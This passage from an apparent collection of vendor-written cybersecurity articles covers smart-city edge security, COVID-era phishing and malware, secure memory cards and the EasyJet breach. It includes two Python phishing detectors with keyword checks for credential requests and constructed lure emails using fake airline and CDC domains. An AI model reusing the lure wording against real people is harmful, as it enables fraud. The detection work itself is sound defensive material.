To that end, studies have proven the value of edge computing and smart IoT edge devices, particularly when it comes to smart cities. A comprehensive survey on “Edge Computing Enabled Smart Cities” by Khan et al for the Institute of Electrical and Electronics Engineers (IEEE) stated that “it is evident from literature that IoT is an integral part of smart cities. The next step is enabling the resource intensive and strict latency IoT based smart city applications. Edge computing provides a promising way of enabling these applications by offering computation and storage resources with low latency.”

However, metropolises still have a significant issue to figure out—security—when leveraging the power of edge computing in smart cities. How can our global municipalities offer secure connectivity from their datacenters (as well as from the cloud) to the edge? The answer lies in the secure environment provided by software-defined perimeter (SDP) technology.

Safeguarding the Edge

SDP software provides the needed security for smart IoT edge devices by creating a “zero trust” environment. This means edge devices don’t have full network access, but instead can only access the exact applications that the city’s IT department has authorized them to see, whether in the cloud or datacenter.

In other words, SDP allows for access at the application level only, not at the network level. As a result, lateral attacks are no longer possible, and smart cities can enjoy the “secure by default” architecture that they require.

Here’s how SDP solutions work to help create secure, hyperconnected smart cities:

• SDP software allows for data transfer, by way of encrypted micro-tunnels, right from smart IoT edge devices to various destinations—whether an on-premises site, multi-cloud, or hybrid-cloud setting.

• To ensure secure connectivity and transmission, SDP also uses public key authentication.

• Specific types of SDP software make this happen through an enhanced user datagram protocol (UDP), which has randomly generated ports that render the tunnels basically invisible to cybercrooks.

Other benefits for city IT staff include that SDP offers easy configuration and management, which aids scalability. The software requires no appliances, and also avoids the various maintenance and security challenges of VPNs, which were designed for a physical-server environment. SDP has performance advantages as well, with the encrypted micro-tunnels offering the ability to be made highly available.

Smart devices and edge computing have a proven ability to help smart cities advance and problem-solve—but without secure connectivity, these measures fall short. By pairing an SDP client with smart devices, those who are working on creating the hyperconnected smart cities that will take us into the future can safeguard their investment of time, resources, and data as well.

About the author

Don Boxley Jr is a DH2i co-founder and CEO. Prior to DH2i, Don spent more than 20 years in management positions for leading technology companies, including Hewlett-Packard, CoCreate Software, Iomega, TapeWorks Data Storage Systems and Colorado Memory Systems. Don earned his MBA from the Johnson School of Management, Cornell University.

Managing Small Business Cybersecurity During Covid-19

By Bill DeLisi, CEO of GOFBA

Small businesses are undertaking extraordinary changes during the coronavirus epidemic. They’re laying off staff, shifting their business models, and managing the challenges of remote work. The pace of the stay-at-home orders and the abrupt halt of the economy required small businesses to move quickly. States are in the midst of gradually reopening, but many smaller firms will continue to face impactful challenges for the rest of the year and beyond. In addition to the safety and health concerns, small firms are also facing cybersecurity risks.

Compared to enterprise-level firms, small businesses do not possess massive IT budgets to confront threats. Large firms have capital to weather business interruptions that might come from data breaches. Small businesses are already devastated during COVID-19; they can’t risk losing data and being offline for even a day. And there’s the PR hit that comes with a data breach event. A small firm cannot likely survive a breach, especially in the current economy where competition for dollars is at a premium.

Unfortunately, there are many bad actors out there. Cybersecurity hacking attempts are rising during the COVID-19 pandemic, as hackers prey on fear and uncertainty. To that end, here are three of the most persistent and damaging COVID-19 driven security threats for small business, along with some tips for mitigating the risks.

1. Stop Malware in its Tracks

Malware encompasses spyware, viruses, trojans, and other tools hackers use to infect computers. The actual programs live on attachments and within software such as PDF viewers. Staff members must avoid downloading unapproved programs and understand the types of actions that can lead to malware.

The COVID-19 outbreak offers opportunity for hackers. For example, there’s malware embedded in some live maps of the virus’ spread. COVID-19 themed malware that wipes a computer clean is also circulating.

Firewalls and anti-malware programs are a first line of defense for small businesses. These programs must use automatic updating for maximum protection so they can detect the latest threats.

Workers now operating from home are exposing their company’s data and networks. They’re using home Wi-Fi, and many are searching on non-approved or dangerous websites. Restricting search for remote workers is tricky but is possible through a secure search engine such as GOFBA. This platform limits malware by stopping users from reaching suspicious sites, while still allowing them to access information that pertains to their jobs. Small business staff should also limit their information gathering about the COVID-19 epidemic to established news and health organization sites. Unknown sites filled with information about pandemic “cures” or various conspiracy theories and other content are likely filled with malware.

2. Prevent Phishing

Phishing schemes are simple. A hacker creates a formal-looking email and sends it out to a large group of recipients. Their goal is for someone to open the email and either click a link or download an attachment. That simple action then launches malware which infects the person’s computer and the linked company network. The hacker then controls the firm’s data, encrypts it, and holds it for ransom.

The pandemic provides ample material for phishing schemes. Emails touting fake COVID-19 tests or miracle cures prey on people’s fear about the virus. Other emails pushing for donations to charities prey on people’s willingness to help, while directing money to fraudulent accounts. Many phishing emails mimic communications from local government agencies or the CDC, with official-sounding messages about pandemic news or recommended actions.

Small business workers must read about the dangers of such emails, and how to recognize fake and dangerous communications. The typical phishing email gives itself away with some clues:

• Amateurish design with outdated graphics and feel

• Unprofessional-sounding content with misspellings

• Odd URLs that do not match the company/organization (users can hover their mouse on links to see the destination address)

• The email asks the recipient to confirm personal information, such as “Enter your SSN to see if you qualify for free COVID-19 testing”

• Messages that play on panic and suggest urgent action are very often phishing schemes
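The “odd URL” clue above is one that can be checked mechanically, before anyone hovers a mouse. The following is an added example, not code from the article or from GOFBA: it parses an HTML mail body with Python’s standard library, pulls out every link, and flags anchors whose visible text names one domain while the href really points to another, or whose destination lies outside the domain the mail claims to come from. The sample mail body and every domain in it are constructed for illustration.

```python
"""Flag e-mail links whose visible text and real destination disagree.

Added example (not code from the article or from GOFBA). It uses only the
Python standard library; the sample mail body below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None  # href of the <a> currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            # Normalise whitespace so line breaks inside the anchor do not matter.
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def registrable_domain(host):
    """Approximate the registrable domain by the last two labels.

    Assumption: no public-suffix list is consulted, so this is accurate for
    plain TLDs such as .com, .org or .gov but not for e.g. .co.uk.
    """
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


# Something that looks like a host name inside the link's visible text.
_HOST_IN_TEXT = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


def find_mismatched_links(html_body, expected_domain=None):
    """Return one finding per suspicious link.

    A link is suspicious when its visible text names a domain other than the
    one the href really points to (the "hover to see the destination" clue),
    or, if expected_domain is given, when it leads outside the domain the mail
    claims to come from. Links without an http(s) host are ignored.
    """
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        target = urlparse(href)
        if target.scheme not in ("http", "https") or not target.hostname:
            continue
        target_domain = registrable_domain(target.hostname)
        shown = _HOST_IN_TEXT.search(text)
        if shown and registrable_domain(shown.group(1)) != target_domain:
            reason = "text names %s but link goes to %s" % (
                registrable_domain(shown.group(1)), target_domain)
            findings.append({"href": href, "text": text, "reason": reason})
        elif expected_domain and target_domain != registrable_domain(expected_domain):
            findings.append({"href": href, "text": text,
                             "reason": "link leaves %s" % expected_domain})
    return findings


# Constructed sample: a lure of the "free COVID-19 testing" kind described above.
SAMPLE_EMAIL = """
<p>Dear customer, your free COVID-19 test is waiting.</p>
<p>Visit <a href="http://cdc.gov.covid-relief-example.net/test">www.cdc.gov</a>
to confirm eligibility, or read the official
<a href="https://www.cdc.gov/coronavirus">CDC guidance</a>.</p>
<p><a href="https://account-verify-example.biz/login">Verify your account now</a></p>
"""

if __name__ == "__main__":
    for finding in find_mismatched_links(SAMPLE_EMAIL, expected_domain="cdc.gov"):
        print("SUSPICIOUS: %(text)r -> %(href)s (%(reason)s)" % finding)
```

Run against the sample, the first link is flagged because its text says cdc.gov while the host is an unrelated domain, and the last one because it leaves the claimed sender’s domain; the genuine CDC link passes.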

Remote employees need a better understanding about phishing emails and should err on the side of caution before clicking any links or attachments. Remind the employees that deleting the email is the safest move.

3. Properly Manage BYOD

With a massive move towards remote work comes the need for laptops and phones to connect to work. Some firms provide employees with devices. Others use a BYOD, or “Bring Your Own Device” policy that allows employees to utilize their personal device to access work software.

There are multiple risks when employees use their own devices for work. Since they’re at home and comfortable with their phone and laptop, many users will engage in riskier searches and look at sites they’d never consider at the workplace. These sites increase exposure to malware, which then puts the connected company networks at risk.

Small businesses must take the time to implement personal device policies. This includes detailing how employees are accessing and storing company data. For example, are staff saving information to their laptops? Are they using unsecured cloud storage through Google or Dropbox instead of the corporate cloud? Do employees use strong two-factor passwords? What happens with data access when a remote worker leaves a company? A formal plan is essential for protecting both the company and the employees.

Companies must strike a balance during this work-from-home period. They need to protect their data through rules and processes while also giving staff enough flexibility to access needed information. There are also privacy considerations in play. Small business owners must understand the employee’s family members are also using the home Wi-Fi, so there’s only so much control the owners can exert. A solid approach for remote workers is to create formal guidelines to include mobile device management software that automates updates, features virus detection, and gives employees limited control. The key is transparency. Both the employee and employer are on the same page regarding expectations and rules. And as the pandemic eases in some areas, business owners must decide if workers can remain at home, need to come back to offices, or if they will adopt a hybrid approach.

Key Takeaway

During the pandemic, small business owners are pivoting while trying to retain good employees. Cybersecurity threats are an additional unneeded stressor for already strained companies. Thankfully, by following guidelines for remote workers and managing risks, firms can reduce the chances of a cybersecurity event and focus on making it through the crisis.

About the Author

Bill DeLisi is one of the world’s most authoritative experts on cybersecurity. He is currently the Chief Executive Officer, Chief Technology Officer and a founding member of the Board of Directors for GOFBA, Inc. DeLisi has more than 30 years of experience in the computer industry, including holding the position of Chief Technology Officer at several companies. He has worked closely with Microsoft Gold Certified Partners, helping pioneer “cloud” computing and creating security infrastructures that are still in use today. DeLisi is responsible for the development of proprietary technology that serves as the backbone of GOFBA’s platform and has over 30 certifications with Microsoft, Cisco, Apple, and others, which includes the coveted Systems Engineer with Advanced Security certification, as well as expert status in Cloud Design and Implementation.

Bill DeLisi, CEO of GOFBA. Bill can be reached via email at bill@gofba.com or on his company website www.GOFBA.com.

IOT Security Embedded in Memory Cards

AS DEVICES, MACHINERY AND MANUFACTURING PLANTS GET SMARTER, THEY ALSO BECOME MORE VULNERABLE.

By Hubertus Grobbel, Vice President Security Solutions, Swissbit.

When designing networked devices, machinery and production facilities, developers need to place more focus on security aspects. Swissbit now offers a flexible, hardware-based approach that includes TPM (Trusted Platform Module) and data encryption.

For IT and data security, systems communicating over the Internet or via their gateways in the IoT (Internet of Things) need to have a unique and non-cloneable identity. Systems must also be able to send, receive and store cryptographically and heavily secured data. Solutions involving only the use of software rarely offer sufficient protection. This presents developers and manufacturers with great challenges.

Swissbit, the storage and security expert, offers a new hardware-based approach. Developers of embedded systems for industrial applications know Swissbit as the only independent European manufacturer of flash memory products. Many see the Swiss company, manufacturing in Germany, as their top choice for robust, durable SSDs with PCIe and SATA interfaces, CompactFlash, USB flash drives, SD and microSD memory cards and managed NAND BGAs.

Based on decades of experience in the protection of stored data, Swissbit has now developed a new advanced approach to security for embedded IoT devices. The thought process behind the development is that every device needs memory to act as a boot medium, for log files, and as data cache memory in case of network failures. These memory interfaces can and should have security features.

Security in memory card format

Swissbit’s new security solution consists of a flash memory chip, produced and tested for industrial requirements. This chip runs a special version of the durabit firmware with an integrated AES 256-bit encryptor (Fig. 1). The DP (Data Protection) version encrypts and protects all data in various ways (CD-ROM mode, PIN protection, hidden memory, WORM mode). For the hardware-based protection of the communication in the IoT, another security anchor is required. Swissbit’s security modules come with solutions such as an Infineon/NXP Smart Card Chip CC EAL 5+/6+. An API, an SDK and a PKCS#11 library are available for application development.

Fig 1. The structure of a microSD card with security features.

Designating an ID to things

Security experts trust in microSD cards with a secure element for encrypting mobile phone communications. Similar to the communication between people, the communication of things across the Internet also needs to employ identification, authentication and authorization. In other words, how does a “thing” know that the data or data queries received from another “thing” are correct and that the source of a message is truly the system component that it claims to be? Swissbit security memory media, with secure element, provide applications and systems with a unique identity. “Things” get a counterfeit-proof ID and, as such, networked systems can be protected from misuse and “identity theft”, and data access can be restricted. Smart cards that are integrated onto memory cards provide systems with non-cloneable identities, transforming them into uniquely identifiable M2M (machine-to-machine) communication participants that can authenticate themselves and send and receive cryptographically heavily secured data.

Another important device-specific application for these Swissbit solutions is Trusted Boot. Trusted Boot ensures that software can only be run on specific hardware or hardware classes. A secure flash memory card can be used to manage software licensing and feature activation. Access control, code encryption or digital signature allow the definition and management of different software configurations for products.

Retrofittable and future-proof

In comparison to a soldered TPM, the idea of a pluggable security module might at first seem unusual. However, older machinery and systems generally have a USB interface or interfaces for memory cards (Fig. 2). Therefore, the big advantage of using pluggable security modules is that existing devices can easily be retrofitted and secured using Swissbit security memory.

This ability to retrofit devices offers another advantage in the constant race to keep up with cyber security. Attack and defense methods develop cyclically, and harmonizing them with, for example, the project lifecycle of an industrial plant is challenging. A situation could arise where it is necessary to allocate a new ID with improved cryptography technologies to the M2M communication participants. Swissbit’s retrofittable solution makes this possible.

Fig 2. Memory interfaces, such as USB, can be used to retrofit a TPM function.

Outlook

In response to the rapidly increasing market demand for embedded IoT, Swissbit opened its new factory in October 2019, located in Berlin, Germany. This factory is equipped with state-of-the-art advanced 3D chip scale packaging technology, developing and producing customized system-in-package and multi-chip module designs for its customers. This technology facilitates not only the integration of microcontrollers, NAND chips and crypto chips, but also sensors, wireless chips and antennas. Using memory interfaces with TPM and encryption components for security solutions might only be the beginning, with the scope for the addition of further functionalities that can be miniaturized and integrated.

About the Author

Hubertus Grobbel is the Vice President Security Solutions at Swissbit.

Hubertus can be reached online at [email] and at our company website https://swissbit.com/en/

How To Fight A Virus: Lessons From Cybersecurity

By Yotam Gutman, SentinelOne

There has been a great deal of conversation around the similarities between the spread of the Covid-19 virus and that of computer viruses. And indeed, as the first global pandemic to occur during the age of connectivity, this comparison is valid. But while most focus on how we can leverage the knowledge gained in the “real world” in identifying and stopping the spread of plagues in the virtual world, I would like to offer another perspective.

Perhaps we in cybersecurity can return the favor. Perhaps the medical world can take the lessons learned in three decades of fighting “cyber viruses” and implement these in their fight to mitigate the Coronavirus?

History

Originally, the type of computer software described as “a program that can infect other programs by modifying them to include a, possibly evolved, version of itself” was named “Virus” by Fred Cohen in his 1986 Ph.D. thesis. Another biological reference made its way into the computer lingo when the first worm was unleashed (although the phrase was used in an earlier sci-fi novel).

In the last couple of years, computer viruses, or more widely the panoply of malware as we think of cybersecurity today, have undergone rapid evolution that has made them much more difficult to identify and mitigate:

More variants: 439,000 new malware variants were detected in 2019. That’s a 12.3% increase over the previous year.

More capable: Modern malware threats are far more capable than the old viruses spreading through illegal copies of software distributed via floppy disks. Today’s malware can steal passwords, exfiltrate sensitive data, encrypt and delete data, and much more.

Harder to detect: Malware authors work hard to make their software difficult to detect. This includes hiding it in legitimate documents (aka “weaponizing” Word, PDF and Excel documents), utilizing detection-evasion mechanisms (like avoiding execution in sandboxed environments), and using legitimate software update mechanisms, all to make the work of the defenders harder.

More aggressive: Some malware types are extremely aggressive; they scan for open RDP ports, brute-force their way onto a device, and then move laterally within the organization’s network, abusing password-protected servers and seeking sensitive data, all without the knowledge of the victim.

Fast: Contemporary malware is extremely fast and works at machine speed to bypass protection mechanisms and achieve its goals—ransomware like “WannaCry” disabled entire organizations in minutes.

Adopting Cybersecurity Response to Fight Covid-19

To mitigate today’s plethora of rapidly evolving cyber threats, the cybersecurity industry has developed several methodologies. These (after adaptation) could be used to reduce the spread of malicious software and to mitigate its effects. I will refrain from discussing the obvious virus/Anti-virus analogy. Obviously, a vaccine for a computer “virus” would be the answer, but estimates suggest that such a vaccine would not be available in the next 12-18 months, and there’s a lot we can do until then:

Zero trust policy: A methodology that defies the traditional security assumption that everything inside the perimeter (protected by the firewall) is trusted. The main principle of Zero Trust is “never trust, always verify”. This means that every user is asked to verify their credentials every time they wish to “enter” the organization and that every file and process is constantly monitored – even if they have been “authorized” to run on the computer.

In a similar manner, humans should consider that other humans are carriers, and only “trust” them after they have been tested negative (or at the minimum, have had their temperature taken).

Detection beats prevention: Following a similar line of thought, most organizations today operate under the “Assume a Breach” paradigm. Instead of striving to identify and mitigate 100% of threats 100% of the time, they assume that some threats would be able to infect them and concentrate their efforts on quickly finding these and stopping them before they could do more harm.

Similarly, it is prudent to assume that humanity would not be able to vanquish this virus, and we will be playing “whack-a-mole” with it for the foreseeable time. Given that this is the case, it’s prudent to invest in rapid detection of the infection (quick detection kits, even home detection kits), ensure those that are sick are given quick treatment, and continue to monitor the entire population for outbreaks.

Segmentation: An important principle that limits the “movement” within the organization, so that intruders cannot move freely and infect other parts of the organization.

The real-life manifestation would be to identify infection “hot-spots”, lock these down and then tend to those infected rather than to lock down entire countries.

Risk modeling: It might be possible, perhaps, to provide 100% security, 100% of the time, but the cost to the organization would be detrimental; either the security costs would be through the roof, or the security restrictions imposed to maintain 100% security would cause the business to stand still. Instead, a CISO conducts risk assessments and prioritizes security spending to mitigate the most acute threats and secure the most valuable assets.

Healthcare officials should do the same and ensure that the most sensitive segments of the population (elderly, sick) are being shielded from the disease and, if need be, are provided with better care.

Intelligence intake: Fighting a stealthy enemy is hard because you don’t know what to expect. Security professionals, governments, and those in the security industry have been formally and informally sharing information about malware, cybercrime groups, and data leaks for a long time. This has proved to be immensely helpful in fighting and defeating cybercrime rings.

Such collaboration should also be adopted by global scientific and medical communities, governments, and healthcare organizations. As this threat is new to humanity, we should all share information about detection and treatment mechanisms and notify others when we think we’ve made breakthroughs in finding a cure or a vaccine.

Conclusion

We can debate the similarities between biological and computer “viruses” (which, some believe, more resemble a bacterium than a virus), but the analogy is, for the most part, correct. Viruses are dangerous to the victims, and they spread quickly through the population until a cure or a vaccine is found. The spread of the Coronavirus pandemic and its impact on our lives is nothing like the world has seen before. It spread almost at machine speed and overwhelmed countries and healthcare organizations. We believe that utilizing the lessons learned by the cybersecurity industry in the past 3 decades could help to thwart the Coronavirus pandemic.

About the Author

Yotam Gutman, Lt. Commander (Ret.), Israel Navy, has filled several operational, technical, and business positions at defense, HLS, Intelligence, and cybersecurity companies, and provided consulting services for numerous others. Yotam joined SentinelOne 6 months ago to oversee local marketing activities in Israel and contribute to the global content marketing team. Yotam founded and managed the Cybersecurity Marketing Professionals Community, which includes over 300 marketing professionals from more than 170 cyber companies. Yotam was chosen as one of the 5 Security Influencers to Follow on LinkedIn.

How to Combat Cybersecurity Attacks & Cyber Warfare

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

It’s no secret that cybersecurity attacks and cyber warfare are real challenges and threats to the safety of individuals, businesses, organizations — and especially the government. Personal and professional data, including passwords, credit card and bank account information, and Social Security numbers can be vulnerable. Plus, it can take months — even years — to recover from cyberattacks and cases of identity theft. According to CNBC, cyberattacks cost businesses of all sizes an average of $200,000, and “60% go out of business within six months of being victimized.”

A professor of business technology predicted in a recent Forbes article that cyberattacks will be more prevalent in 2020 “because it’s the cheapest, easiest, fastest, and most effective form of warfare we’ve ever seen, and because cyberwarfare defenses are more vulnerable than they’ve ever been.”

But what is cyber warfare, exactly? The RAND Corporation defines the term as “the actions by a nation-state or international organization to attack and attempt to damage another nation’s computers or information networks through, for example, computer viruses or denial-of-service attacks.”

There are many types of attacks and warfare, including phishing, ransomware, and mobile- and cloud-based attacks. We’ll outline some of the most common and offer solutions to help you take the necessary precautions and steps toward securing your data and private information.

What Are the Different Types of Threats?

Phishing

The U.S. Securities and Exchange Commission defines phishing as “the use of fraudulent emails and copy-cat websites to trick you into revealing valuable personal information — such as account numbers for banking, securities, mortgage, or credit accounts, your Social Security numbers, and the login IDs and passwords you use when accessing online financial services providers.”

The goal, of course, is to use your personal information to steal your money and/or your identity. Phishing also targets short message service (text messages) — and there’s also the possibility of “spearfishing by video,” which allows hackers to “leverage new tools such as ‘deep fake’ technology to look and sound like a trusted person (e.g., a Facetime with an attacker posing as a CEO).”

An article about 2020 cybersecurity predictions from SC Media predicts that “company microtargeting with industry-specific tools will rise.” It’s more important than ever that organizations have the proper controls in place to educate their employees and detect these kinds of threats.

Ransomware

The Department of Homeland Security defines ransomware as “a type of malicious software, or malware, designed to deny access to a computer system or data until a ransom is paid. Ransomware typically spreads through phishing emails or by unknowingly visiting an infected website.”

According to a recent Forbes article, business ransomware attacks were on the rise in the first quarter of 2019, and the trend is expected to continue in 2020 because “as the FBI softens its stance on businesses paying ransoms, the number of ‘successful’ ransomware attacks (i.e. those in which the ransom is paid) will double, with total losses of all reported attacks increasing significantly.”

Mobile Attacks

The Pew Research Center estimates that more than 5 billion people around the globe have mobile devices (over half of which are smartphones), and according to HubSpot, 52% of web traffic around the world is mobile.

With so much widespread cell phone ownership and use, it’s no wonder that hackers are threatening mobile devices. According to Lookout, “traditional secure email gateways block potential phishing emails and malicious URLs, which works for protecting corporate email from account takeover attacks, but neglects mobile attack vectors, including personal email, social networking, and other mobile centric messaging platforms such as secure messaging apps and SMS/MMS.”

It’s also worth noting that with every new piece of technology (such as the latest smartphone model) comes security challenges. For example, the debut of 5G means new problems with malware aiming to take advantage of the security features, according to AVG.

Cloud-Based Attacks

According to Threatpost, “as more corporate infrastructure moves to the cloud, so will the focus of criminals.” This means that while conducting an attack will be more of a challenge, attacks may become more sophisticated and more common.

Businesses and organizations are also more confident when it comes to the cloud. But confidence doesn’t always translate to tighter security measures. According to Forbes, “60% of organizations don’t understand the shared responsibility model when it comes to who secures workloads in the cloud. This will create a false sense of security in cloud security providers by their customers, as the latter are responsible for securing privileged access to their cloud administration accounts and workloads.”

Artificial Intelligence and Voice Phishing

As technology becomes more advanced, so do the types of cyberattacks. For example, “deepfake technology” can be used to exploit people in scams. According to MSNBC, the term deepfake refers to instances where creators have produced digital content by manipulating images and voices — and even created fake videos that look real. In one instance, according to Forbes, a CEO gave up $243,000 due to a deepfake scam.

An article about 2020 cybersecurity predictions in SC Magazine asserts that “voice phishing will become the new phishing bait.” In other words, it’s now easier than ever for scammers to sound like someone else. High-level people such as executives and politicians are expected to face heightened risk with advanced deepfake technology. Those scammers can then leave voicemails (or speak directly with callers) asking for donations or for personal information.

How to Protect Yourself: Solutions & Tips

There are many ways to protect yourself — and your business or organization — from cyberattacks and cyberwarfare. The Department of Homeland Security (DHS) is a good place to start and provides the following tips:

• Maintain up-to-date software and operating systems

• Ensure that your passwords are strong

• Remain vigilant and watch out for suspicious activity

• Do not click on links or open emails if you’re unsure

• Do not provide personal information

• Use secure internet connections

• Back up your folders and files

• Protect your home and/or business network

Protecting your email is especially important. Investing in a good email archiving solution can also help you mitigate a potential attack by offering backup and disaster recovery options.

It’s also important to be aware of the types of email messages you’re receiving. Poor spelling and grammar, mismatched URLs, messages asking for personal information, and notes where you didn’t initiate the action are just some examples of signs of a possible phishing attack.

Even though DHS recommends using two methods of verification, many other resources recommend multi-factor authentication. This means that a computer (or mobile device) will only grant you access after you present at least two pieces of “evidence” that only you would know or have access to.

“Evidence” includes information such as passwords and PIN numbers, or physical characteristics such as a fingerprint or voice recognition. The authentication could also be a physical item, such as a security token.

Many organizations are also adopting Disaster Recovery-as-a-Service (DRaaS), which is “defined as providing a remotely hosted disaster recovery service to protect a business’s data and applications,” according to Carbonite.

With the sheer volume and variety of cyberattacks and warfare targeting individuals and organizations, it’s more important than ever to take the appropriate precautions to ensure that personal information and data remains secure and safe.

About the Author

Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

COVID-19 And the Easyjet Hack - A Perfect Phishing Storm

By Shachar Daniel, Safe-T’s CEO

As if the airline industry didn’t have enough to worry about at the moment, on May 19, EasyJet, the UK’s biggest budget airline, announced it had been breached. Exposed in the attack were the email addresses and travel information for 9 million customers. A small group of customers also had their credit card details, including the CVV, exposed in the attack, which lasted from October 2019 to March 2020.

Although EasyJet first learned about the attack in January, they only began informing those customers whose credit card information was exposed in April. The airline said they did not disclose the attack earlier due to the complexity involved in piecing together which systems and which individuals had been affected. According to the UK's Information Commissioner's Office, “This was a highly sophisticated attacker. It took time to understand the scope of the attack and to identify who had been impacted."

Bad Timing - COVID-19 and Airline Scams

The EasyJet hack just happens to come at a spectacularly rotten time, as airlines around the world, EasyJet included, are dealing with severe losses due to COVID-19. According to Dr Jason Nurse of the Kent Interdisciplinary Research Center, “It is clearly a difficult time for the travel industry considering the impact of COVID-19 on operations. A cyber-attack is the last thing an airline would want to deal with now.”



To make matters even more complicated, authorities have warned customers to be on the lookout for phishing emails offering refunds on flights, now that their personal details may be up for grabs on the dark web. According to privacy expert Ray Walsh, "Anybody who has ever purchased an EasyJet flight is advised to be extremely wary when opening emails from now on...Phishing emails that leverage data stolen during the attack could be used as an attack vector at any point in the future.”

In fact, a recent statement from EasyJet compelled customers to think critically when opening EasyJet emails, saying "We are advising customers to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays."

But EasyJet was not the only airline to have phishing campaigns associated with it over the course of the pandemic. As the impact of COVID-19 began to take hold in late March and airlines started canceling flights, Emirates Airlines warned customers about circulating fake flight refund emails, and email security provider Mimecast alerted authorities to a major uptick in flight-related email scams involving a variety of airlines. Other security firms noted a rise in voice-based flight cancellation scams, wherein scammers, posing as airline agents, called random people to discuss purported flight cancellations and, in the process, tried extracting personal information.

And now, as airlines across the world attempt to cut their losses, they are offering heavy discounts on flights, for whenever regular flights do resume. As inboxes fill up with enticing promotions offering deals on future flights, customers should remember that while many of these emails are legitimate, a significant portion are phishing emails, cashing in on the confusion created by COVID-19.

How to Spot a Travel-Based Phishing Email

Meanwhile, it’s important to note that since travel information was included in the stolen EasyJet data set, phishing emails sent to those customers may be highly targeted and include real elements, like dates and destinations, making the emails seem legitimate. If your data was exposed in the EasyJet hack, there are some relatively simple ways to protect yourself from falling prey to the ensuing phishing threats. What’s more, these tips can be just as easily applied to any trending COVID-19 airline email scams out there today. So when you get flight promotions or cancellation notices, be sure to:

- Look at the sender's email address - does it match the name of the airline or is it slightly off? For example, if it says EasyJetTravel.com, JetBlueFlights.com, or SouthWestTickets.com, you can rest assured it’s a scam.

- Avoid any email requesting personal information, such as credit card information, dates of birth, or social security numbers.

- Delete messages that include links or attachments, which are often filled with malware payloads.

- Think twice when it comes to promotions requiring the reader to take action NOW! Scammers try to get their targets to act impulsively, before critical thinking can get in the way. If there’s no time to make a thought-out decision, that's a bad sign.
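The four checks above, turned into code as an added example (not from the article or from Safe-T): a Python function that reads one email message, extracts the sender's domain, and reports which of the warning signs fired. The brand-to-domain allow-list, the keyword patterns and the two sample messages are constructed for the example; the lookalike sender domain in the phishing sample is of the EasyJetTravel.com kind the article describes.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed allow-list for this example (assumption): the domains each brand
# really sends from. A mail gateway would maintain this list per organization.
LEGIT_DOMAINS = {
    "easyjet": {"easyjet.com"},
    "jetblue": {"jetblue.com"},
    "southwest": {"southwest.com"},
}
URGENCY = re.compile(r"\b(now|immediately|within 24 hours|urgent|act fast|last chance)\b", re.I)
SENSITIVE = re.compile(r"\b(credit card|cvv|date of birth|social security|password|passport)\b", re.I)
LINK = re.compile(r"https?://", re.I)


def sender_domain(from_header: str) -> str:
    """Return the domain part of the address in a From header, lower-cased."""
    _name, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def brands_in(text: str):
    """Brands whose name appears in the text (spaces removed so 'Easy Jet' matches)."""
    flat = text.lower().replace(" ", "")
    return [brand for brand in LEGIT_DOMAINS if brand in flat]


def assess(raw_message: str):
    """Apply the four checks from the list above to one RFC 822 message and return
    the warnings that fired (an empty list means nothing looked suspicious)."""
    msg = message_from_string(raw_message, policy=policy.default)
    from_header = str(msg.get("From", ""))
    subject = str(msg.get("Subject", ""))
    display_name, _addr = parseaddr(from_header)
    domain = sender_domain(from_header)
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    findings = []

    # 1. Sender address: a brand named in the display name, subject or domain
    #    whose real domain does not back the sender (e.g. easyjettravel.com).
    for brand in brands_in(f"{display_name} {subject} {domain}"):
        if domain not in LEGIT_DOMAINS[brand]:
            findings.append(f"sender domain '{domain}' is not a known {brand} domain")
    # 2. Requests for personal information.
    if SENSITIVE.search(body):
        findings.append("asks for personal information")
    # 3. Links or attachments.
    if LINK.search(body):
        findings.append("contains a link")
    if any(part.get_filename() for part in msg.walk()):
        findings.append("contains an attachment")
    # 4. Pressure to act immediately.
    if URGENCY.search(f"{subject} {body}"):
        findings.append("pressures the reader to act immediately")
    return findings


# Constructed sample messages for the example (not real mail).
PHISHING_SAMPLE = (
    "From: EasyJet Refunds <refunds@easyjettravel.com>\n"
    "Subject: Your COVID-19 flight refund - act NOW\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "Confirm your credit card number and CVV at http://easyjettravel.com/refund "
    "within 24 hours to receive your refund.\n"
)
LEGITIMATE_SAMPLE = (
    "From: easyJet <no-reply@easyjet.com>\n"
    "Subject: Your booking confirmation\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "Thank you for booking with us. Your flight departs at 10:00 on 21 July. "
    "You can manage the booking from the app.\n"
)

if __name__ == "__main__":
    for label, sample in (("phishing", PHISHING_SAMPLE), ("legitimate", LEGITIMATE_SAMPLE)):
        print(label, assess(sample) or ["no warnings"])
```

The domain check is deliberately strict: a brand name anywhere in the display name or subject must be backed by that brand's real sending domain, which is exactly what a lookalike such as EasyJetTravel.com fails. Links and attachments are reported rather than auto-deleted here because legitimate airline mail contains them too; the value is in seeing several signals fire together.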

COVID-19 is waning and the world is starting to open up again. This is great news for consumers as well as the airline industry—but as always, remember that scammers love to capitalize on fluctuating circumstances—so proceed with caution before booking any deals.

About the Author

